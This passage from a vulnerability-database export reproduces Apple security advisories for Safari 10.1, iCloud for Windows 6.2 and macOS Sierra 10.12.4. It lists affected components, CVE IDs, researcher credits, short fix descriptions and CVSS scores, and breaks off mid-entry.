Trend Micro's Zero Day Initiative \n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, natashenka of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. 
This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project 
Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. 
This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of Safari 10.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], 
"modified": "2017-03-27T00:00:00", "id": "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:51", "description": "# About the security content of iCloud for Windows 6.2\n\nThis document describes the security content of iCloud for Windows 6.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. 
This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. 
[Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 24, 2017\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-28T00:00:00", "type": "apple", "title": "About the security content of iCloud for Windows 6.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2383", "CVE-2017-2463", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-28T00:00:00", "id": "APPLE:20D403FA17FFAFBF6C005DAD59ACB4F6", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:27", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 6.2\n\nReleased March 28, 2017\n\n**APNs Server**\n\nAvailable for: Windows 7 and later\n\nImpact: An attacker in a privileged network position can track a user's activity\n\nDescription: A client certificate was sent in plaintext. This issue was addressed through improved certificate handling.\n\nCVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical University Munich (TUM)\n\n**libxslt**\n\nAvailable for: Windows 7 and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. 
This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-24T06:47:37", "title": "About the security content of iCloud for Windows 6.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2017-04-24T06:47:37", "id": "APPLE:HT207607", "href": "https://support.apple.com/kb/HT207607", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. 
Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite\n\nReleased March 27, 2017\n\n**apache**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: Multiple issues existed in Apache before 2.4.25. These were addressed by updating Apache to version 2.4.25.\n\nCVE-2016-0736\n\nCVE-2016-2161\n\nCVE-2016-5387\n\nCVE-2016-8740\n\nCVE-2016-8743\n\nEntry updated March 28, 2017\n\n**apache_mod_php**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Multiple issues existed in PHP before 5.6.30\n\nDescription: Multiple issues existed in PHP before 5.6.30. 
These were addressed by updating PHP to version 5.6.30.\n\nCVE-2016-10158\n\nCVE-2016-10159\n\nCVE-2016-10160\n\nCVE-2016-10161\n\nCVE-2016-9935\n\n**AppleGraphicsPowerManagement**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2421: @cocoahuke\n\n**AppleRAID**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2438: sss and Axis of 360Nirvanteam\n\n**Audio**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2420: Pekka Oikarainen, Matias Karhumaa and Marko Laakso of Synopsys Software Integrity Group\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2427: Axis and sss of Qihoo 360 Nirvan Team\n\n**Bluetooth**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory 
management.\n\nCVE-2017-2449: sss and Axis from 360NirvanTeam\n\n**Carbon**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreMedia**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted .mov file may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of .mov files. This issue was addressed through improved memory management.\n\nCVE-2017-2431: kimyok of Tencent Security Platform Department\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**curl**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Maliciously crafted user input to libcurl API may allow arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2016-9586: Daniel Stenberg of Mozilla\n\n**EFI**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious Thunderbolt adapter may be able to recover the FileVault 2 encryption password\n\nDescription: An issue existed in the handling of DMA. This issue was addressed by enabling VT-d in EFI.\n\nCVE-2016-7585: Ulf Frisk (@UlfFrisk)\n\n**FinderKit**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Permissions may unexpectedly reset when sending links\n\nDescription: A permission issue existed in the handling of the Send Link feature of iCloud Sharing. This issue was addressed through improved permission controls.\n\nCVE-2017-2429: Raymond Wong DO of Arnot Ogden Medical Center\n\nEntry updated August 23, 2017\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: 
John Villamil, Doyensec\n\n**FontParser**\n\nAvailable for: OS X El Capitan v10.11.6 and OS X Yosemite v10.10.5\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution \n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2016-4688: Simon Huang of Alipay company\n\nEntry added April 11, 2017\n\n**HTTPProtocol**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Applications using the Hypervisor framework may unexpectedly leak the CR8 control register between guest and host\n\nDescription: An information leakage issue was addressed through improved state management.\n\nCVE-2017-2418: Alex Fishman and Izik Eidus of Veertu Inc.\n\n**iBooks**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Parsing a maliciously crafted iBooks file may lead to local file disclosure\n\nDescription: An information leak existed in the handling of file URLs. 
This issue was addressed through improved URL handling.\n\nCVE-2017-2426: Craig Arendt of Stratum Security, Jun Kokatsu (@shhnjk)\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3, OS X El Capitan v10.11.6, and OS X Yosemite v10.10.5\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges \n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2443: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to disclose kernel memory\n\nDescription: A validation issue was addressed through improved input sanitization.\n\nCVE-2017-2489: Ian Beer of Google Project Zero\n\nEntry added March 31, 2017\n\n**IOATAFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2408: Yangkang (@dnpushme) of Qihoo360 Qex Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2436: Orr A, IBM Security\n\n**IOFireWireAVC**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A local attacker may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2437: Benjamin Gnahm (@mitp0sh) of Blue Frost Security\n\n**IOFireWireFamily**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to cause a denial of service\n\nDescription: A null pointer dereference was addressed through improved input validation.\n\nCVE-2017-2388: Brandon Azad, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel 
privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-2410: Apple\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: 